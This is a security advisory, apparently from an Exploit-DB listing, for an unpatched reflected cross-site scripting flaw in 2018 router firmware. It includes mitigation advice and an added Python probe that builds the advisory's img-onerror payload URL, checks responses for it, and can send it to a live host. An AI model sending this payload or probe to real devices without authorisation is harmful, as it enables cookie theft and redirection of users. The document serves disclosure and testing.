vendor: N/A
by: Usman Saeed
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-site Scripting (XSS))
Product Name: N/A
Affected Version From: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU
Affected Version To: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

Unauthenticated

The remote web server does not filter special characters or illegal input in the request URL, so an unauthenticated attacker can embed a reflected cross-site scripting vector in a crafted link and send it to a victim. When the victim opens the link, the server echoes the vector back into the page and the attacker's script runs in the victim's browser, where it can steal cookies or redirect the victim to a malicious website.

Mitigation:

Validate input and, above all, HTML-encode untrusted data (here, the requested path) at the point where it is reflected into the response. Output encoding is the reliable fix; blacklisting special characters on input alone is easily bypassed.
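The following is an added example, not code from the advisory or from the affected vendor. It rebuilds the advisory's probe URL, models the vulnerable behaviour (the requested path echoed into an HTML page unmodified) next to the hardened form the mitigation calls for (the path HTML-encoded before reflection), and gives a check a tester can run against a real response body. The path prefix /webpages/data/ and the payload are the advisory's; the hostname, the shape of the error page and the function names are assumptions.

```python
"""Reflected-XSS probe and response check (added example, not vendor code)."""
import html
import re
from urllib.parse import quote
from urllib.request import Request, urlopen

# Payload and path prefix as given in the advisory; "hostname" is a placeholder.
PAYLOAD = '<img src=a onerror=alert("Reflected-XSS")>'
PATH_PREFIX = "/webpages/data/"


def build_probe_path(payload=PAYLOAD):
    """Recreate the advisory's request path: marker, vector, then ../..%2f
    (%2f is an already-encoded slash and is kept literally)."""
    return f"{PATH_PREFIX}_._.{payload}../..%2f"


def build_probe_url(host, payload=PAYLOAD):
    return f"http://{host}{build_probe_path(payload)}"


def vulnerable_handler(path):
    """Hypothetical server behaviour matching the advisory's description:
    the requested path is placed in the HTML response without encoding."""
    return f"<html><body><h1>Not found</h1><p>{path}</p></body></html>"


def hardened_handler(path):
    """Same page with the fix the mitigation asks for: the untrusted path is
    HTML-encoded (including quotes) before it enters the markup."""
    safe = html.escape(path, quote=True)
    return f"<html><body><h1>Not found</h1><p>{safe}</p></body></html>"


def reflects_unencoded(body, payload=PAYLOAD):
    """Strict check: the vector survives byte-for-byte in the response."""
    return payload in body


def has_event_handler_tag(body):
    """Broader check: any <img ... onerror=> tag in the body, so partial
    transformations of the payload (e.g. the alert text rewritten) are caught."""
    return re.search(r"<img[^>]*\bonerror\s*=", body, re.IGNORECASE) is not None


def assess(body):
    """Map a response body to a verdict string."""
    if reflects_unencoded(body) or has_event_handler_tag(body):
        return "VULNERABLE: payload reflected unencoded"
    if html.escape(PAYLOAD, quote=True) in body:
        return "SAFE: payload reflected HTML-encoded"
    return "UNKNOWN: payload not reflected"


def probe_live(host, timeout=5):
    """Send the probe to a real host (network access; not exercised here).
    Spaces in the payload must be percent-encoded or http.client rejects the
    request line; the markup characters and the literal %2f are kept as-is so
    the server sees exactly what the advisory sends."""
    path = quote(build_probe_path(), safe='/<>="()%')
    req = Request(f"http://{host}{path}", headers={"User-Agent": "xss-probe"})
    with urlopen(req, timeout=timeout) as resp:
        return assess(resp.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    path = build_probe_path()
    print(build_probe_url("hostname"))
    print("vulnerable handler:", assess(vulnerable_handler(path)))
    print("hardened handler:  ", assess(hardened_handler(path)))
```

Running the module offline prints the probe URL and the two verdicts; pointing probe_live at a real host applies the same assess() logic to the live response. The two checks are deliberately separate: reflects_unencoded is the exact confirmation of this advisory, while has_event_handler_tag still fires when a server mangles the payload but leaves the event handler intact.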

Exploit-DB raw data:

[+] Unauthenticated

[+] Author: Usman Saeed (usman [at] xc0re.net)

[+] Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU

[+] Impact: Client side attacks are very common and are the source of the largest number of user compromises. With this attack, the threat actor can steal cookies or redirect an innocent victim to a malicious website, thus compromising the user.

[+] Reason: The remote webserver does not filter special characters or illegal input.

[+] Attack type: Remote

[+] Patch Status: Unpatched

[+] Exploitation:

[!] The Cross-site scripting vector can be executed, as illustrated below

http://hostname/webpages/data/_._.<img src=a onerror=alert("Reflected-XSS")>../..%2f